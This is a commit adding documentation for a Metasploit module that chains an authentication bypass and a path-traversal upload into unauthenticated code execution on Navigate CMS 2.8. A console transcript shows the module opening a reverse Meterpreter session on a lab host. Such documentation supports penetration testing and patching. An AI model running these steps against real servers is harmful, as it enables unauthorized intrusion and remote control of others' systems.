Add documentation for Navigate CMS Unauthenticated Remote Code Execution

documentation/modules/exploit/multi/http/navigate_cms_rce.md

@@ -0,0 +1,40 @@
+## Description
+
+This module exploits insufficient sanitization in the database::protect method to bypass authentication. It then uses a path traversal vulnerability in navigate_upload.php that allows authenticated users to upload PHP files to arbitrary locations. Together these vulnerabilities allow an unauthenticated attacker to execute arbitrary PHP code remotely. This module was tested against Navigate CMS 2.8.
+
+## Vulnerable Application 
+
+[Navigate CMS 2.8](https://master.dl.sourceforge.net/project/navigatecms/releases/navigate-2.8r1302.zip)
+
+## Verification Steps
+
+1. Install Navigate CMS
+2. Start `msfconsole`
+3. `use exploit/multi/http/navigate_cms_rce`
+4. `set RHOST <rhost>`
+5. `check`
+6. You should see `The target appears to be vulnerable.`
+7. `exploit`
+8. You should get a meterpreter session
+
+## Scenarios
+
+### Navigate CMS on Ubuntu 18.04
+
+```
+msf5 > use exploit/multi/http/navigate_cms_rce
+msf5 exploit(multi/http/navigate_cms_rce) > set RHOST 192.168.178.45
+RHOST => 192.168.178.45
+msf5 exploit(multi/http/navigate_cms_rce) > check
+[*] 192.168.178.45:80 The target appears to be vulnerable.
+msf5 exploit(multi/http/navigate_cms_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.178.35:4444 
+[+] Login bypass successful
+[+] Upload successful
+[*] Triggering payload...
+[*] Sending stage (37775 bytes) to 192.168.178.45
+[*] Meterpreter session 1 opened (192.168.178.35:4444 -> 192.168.178.45:52720) at 2018-09-26 22:24:59 +0200
+
+meterpreter > 
+```